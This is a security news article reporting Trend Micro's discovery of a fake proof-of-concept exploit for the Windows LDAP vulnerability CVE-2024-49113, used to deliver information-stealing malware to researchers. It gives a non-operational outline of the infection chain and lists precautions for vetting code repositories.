Threat actors have created a fake proof-of-concept (PoC) exploit for a critical Microsoft vulnerability, designed to lure security researchers into downloading and executing information-stealing malware, Trend Micro has reported.
The fake PoC relates to a critical vulnerability in Microsoft's Windows Lightweight Directory Access Protocol (LDAP), of which a fix was released in the tech giant’s December 2024 Patch Tuesday release.
CVE-2024-49113 is a denial-of-service (DoS) vulnerability that can be exploited to crash the LDAP service, leading to service disruptions.
Trend Micro reported that the attackers set up a malicious repository containing the fake PoC, which, upon execution, leads to sensitive computer and network information being exfiltrated.
This includes researchers’ computer information, process list, directory lists, network IPs, network adapters and installed updates.
PoC exploits are used in the security research community to identify security weaknesses and potential threats to software, enabling action to take place to address the threats.
“Although the tactic of using PoC lures as vehicle for malware delivery is not new, this attack still poses significant concerns, especially since it capitalizes on a trending issue that could potentially affect a larger number of victims,” Trend Micro wrote.
How the PoC Lure Works
The malicious repository containing the PoC appears to be a fork from the original creator, the firm said.
The original Python files were replaced with the executable poc.exe that was packed using UPX. When a user executes the file, a PowerShell script is dropped and executed in the %Temp% folder. This will create a Scheduled Job, which in turn executes an encoded script.
Once decoded, the script downloads another script from Pastebin, which collects the public IP address of the victim’s machine and uploads it using a file transfer protocol.
Computer and network data is then collected and compressed using a ZIP file, after which it is uploaded to an external FTP server using hardcoded credentials.
Security Researchers Warned to Be Vigilant
Trend Micro warned security researchers to be vigilant of fake PoC lures and to use the following best practices to avoid falling victim to this tactic:
- Always download code, libraries and dependencies from official and trusted repositories
- Be cautious of repositories with suspicious content that may seem out of place for the tool or application it is supposedly hosting
- If possible, confirm the identity of the repository owner or organization
- Review the repository’s commit history and recent changes for anomalies or signs of malicious activity
- Be cautious of repositories with very few stars, forks or contributors, especially if they claim to be widely used
- Look for reviews, issues or discussions about the repository to identify potential red flags